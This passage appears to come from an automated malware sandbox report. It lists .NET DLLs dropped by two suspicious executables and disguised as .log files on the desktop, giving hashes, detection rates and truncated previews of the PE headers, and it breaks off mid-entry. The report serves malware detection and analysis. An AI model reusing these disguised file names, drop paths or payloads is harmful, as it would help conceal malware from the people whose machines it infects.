                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\JTIguxNU.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):126976
                                                          Entropy (8bit):6.057993947082715
                                                          Encrypted:false
                                                          SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                          MD5:16B480082780CC1D8C23FB05468F64E7
                                                          SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                          SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                          SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                          C:\Users\user\Desktop\JVSqkWFI.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):40448
                                                          Entropy (8bit):5.7028690200758465
                                                          Encrypted:false
                                                          SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                          MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                          SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                          SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                          SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 12%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\LeSOATlM.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):41472
                                                          Entropy (8bit):5.6808219961645605
                                                          Encrypted:false
                                                          SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                          MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                          SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                          SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                          SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\LmCheCMS.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):38912
                                                          Entropy (8bit):5.679286635687991
                                                          Encrypted:false
                                                          SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                          MD5:9E910782CA3E88B3F87826609A21A54E
                                                          SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                          SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                          SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\MlnyqaSB.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):36352
                                                          Entropy (8bit):5.668291349855899
                                                          Encrypted:false
                                                          SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                          MD5:94DA5073CCC14DCF4766DF6781485937
                                                          SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                          SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                          SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\OXbzuEDs.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):294912
                                                          Entropy (8bit):6.010605469502259
                                                          Encrypted:false
                                                          SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                          MD5:00574FB20124EAFD40DC945EC86CA59C
                                                          SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                          SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                          SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                          C:\Users\user\Desktop\OoZhLKXw.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):34816
                                                          Entropy (8bit):5.636032516496583
                                                          Encrypted:false
                                                          SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                          MD5:996BD447A16F0A20F238A611484AFE86
                                                          SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                          SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                          SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\PNvPNCKx.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                          C:\Users\user\Desktop\QZUgHzbG.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):36352
                                                          Entropy (8bit):5.668291349855899
                                                          Encrypted:false
                                                          SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                          MD5:94DA5073CCC14DCF4766DF6781485937
                                                          SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                          SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                          SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\RORqBBDl.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):70144
                                                          Entropy (8bit):5.909536568846014
                                                          Encrypted:false
                                                          SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                          MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                          SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                          SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                          SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\ScGOdifB.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33280
                                                          Entropy (8bit):5.634433516692816
                                                          Encrypted:false
                                                          SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                          MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                          SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                          SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                          SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 12%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\TQKWOvbz.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                          C:\Users\user\Desktop\VNlekvqu.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):34816
                                                          Entropy (8bit):5.636032516496583
                                                          Encrypted:false
                                                          SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                          MD5:996BD447A16F0A20F238A611484AFE86
                                                          SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                          SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                          SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\XPYNFevp.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):294912
                                                          Entropy (8bit):6.010605469502259
                                                          Encrypted:false
                                                          SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                          MD5:00574FB20124EAFD40DC945EC86CA59C
                                                          SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                          SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                          SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                          C:\Users\user\Desktop\XjppJZgg.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):39936
                                                          Entropy (8bit):5.629584586954759
                                                          Encrypted:false
                                                          SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                          MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                          SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                          SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                          SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 13%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\ZInvrbgn.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):50176
                                                          Entropy (8bit):5.723168999026349
                                                          Encrypted:false
                                                          SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                          MD5:2E116FC64103D0F0CF47890FD571561E
                                                          SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                          SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                          SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\aZffRVgZ.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):342528
                                                          Entropy (8bit):6.170134230759619
                                                          Encrypted:false
                                                          SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                          MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                          SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                          SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                          SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\bIYNCAnX.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):64000
                                                          Entropy (8bit):5.857602289000348
                                                          Encrypted:false
                                                          SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                          MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                          SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                          SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                          SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\cmFWEbPY.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                          C:\Users\user\Desktop\fXkmLoaR.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
